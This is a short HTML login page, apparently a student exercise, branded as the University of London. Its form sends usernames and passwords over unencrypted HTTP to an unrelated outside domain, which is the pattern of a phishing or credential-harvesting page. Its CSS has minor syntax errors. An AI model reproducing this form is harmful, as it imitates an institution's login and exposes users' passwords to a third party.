
<!Doctype html>
<html>

<head>
<title>Jehovah i thank you for the good things you have done.</title>

<style type="text/css">
    body{background-image: url(DSC_0584uniweb.jpg);
         background-repeat: no-repeat;}
    fieldset{background-color: white;
        }
    p{font-family: Arial, Helvetica, sans-serif;}
    button:hover:active {
      background-color: brown; 
      color: cornflowerblue;
      margin-top: 0px
      padding: 0px
    }
    fieldset {
        width: 260px;
        margin-top: 10px;
        border: 1px solid #d6d6d6;
        line-height: 1.6em;
        margin-left: 600px;
        padding: 20px;}
    a#link {
    margin-bottom: 0px
    text-align: center;
    text-decoration: none;
    color: green;}
    h4 {
    margin: 0px 0px 0px 0px;
    padding: 0px;
    text-align: center;
    }
    a {
    text-decoration: none;}

</style>
</head>

<body>

<fieldset>


<form action="http://www.8thsept.com/register.php" method="post">


<img src="University-of-london-logo-w.png" alt="The logo of University of London" title="The University of London" />

<h2>LOGIN!</h2>

<p>USERNAME:
<br /> <input type="text" name="username" maxlength="64" required />
 
<p>PASSWORD:
<br /><input type="password" name="password" maxlength="64" required/>

<br />
<br />
<button>LOGIN!</button>


<hr />
<a href="forgottenpassword.html" id="link">Have you forgotten your password? </a>
<h4> OR </h4>

Tap the signup button to create an account.
<br />

<button><a href="FORM10.html">SIGNUP</a></button>


<i>
<p>&copy UNIVERSITY OF LONDON</p>
</i>
 
 
 </form>
 </fieldset>
 
 </body>
 
 </html>
 